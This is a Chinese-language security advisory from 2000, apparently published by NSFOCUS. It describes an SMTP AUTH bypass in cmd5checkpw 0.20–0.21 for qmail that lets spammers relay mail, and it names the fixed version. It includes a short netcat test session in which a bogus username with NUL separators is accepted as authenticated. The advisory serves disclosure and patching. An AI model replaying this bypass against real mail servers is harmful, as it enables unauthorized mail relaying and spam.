安全研究

安全漏洞
cmd5checkpw Qmail smptd远程认证错误漏洞

发布日期:2000-10-19
更新日期:2000-10-19

受影响系统:

Krzysztof Dabrowski cmd5checkpw 0.21
Krzysztof Dabrowski cmd5checkpw 0.20
不受影响系统:

Krzysztof Dabrowski cmd5checkpw 0.22
描述:

cmd5checkpw程序通常作为一个qmail-smtpd-auth的插件来使qmail支持SMTP AUTH协议。
然而,由于缺乏对输入数据的检查,如果向cmd5checkpw提供一个不存在的用户名,将
导致它发生段错误。然而qmail-smtpd-auth的补丁代码错误地认为刚才已经通过验证
了,因此一个攻击者可以通过提供给cmd5checkpw一个错误的用户名来建立一个连接,
这将给那些垃圾邮件发送者一个发送垃圾邮件的机会。

<* 来源:Javier Kohen (jkohen@tough.com) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Javier Kohen (jkohen@tough.com)提供了一个测试方法:

$ nc localhost smtp
< 220 ns.foo.com.ar ESMTP
> ehlo spammer.net
< 250-ns.foo.com.ar
< 250-AUTH=LOGIN CRAM-MD5 PLAIN
< 250-AUTH LOGIN CRAM-MD5 PLAIN
< 250-PIPELINING
< 250 8BITMIME
> auth plain
< 334 ok. go on.
> xyzzy<NUL>nopasswordneeded<NUL>
< ??? ok.


建议:

厂商补丁:

cmd5checkpw 0.22版本已经解决了这个问题,您可以从下列地址下载:

http://members.elysium.pl/brush/cmd5checkpw/



浏览次数:5627
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障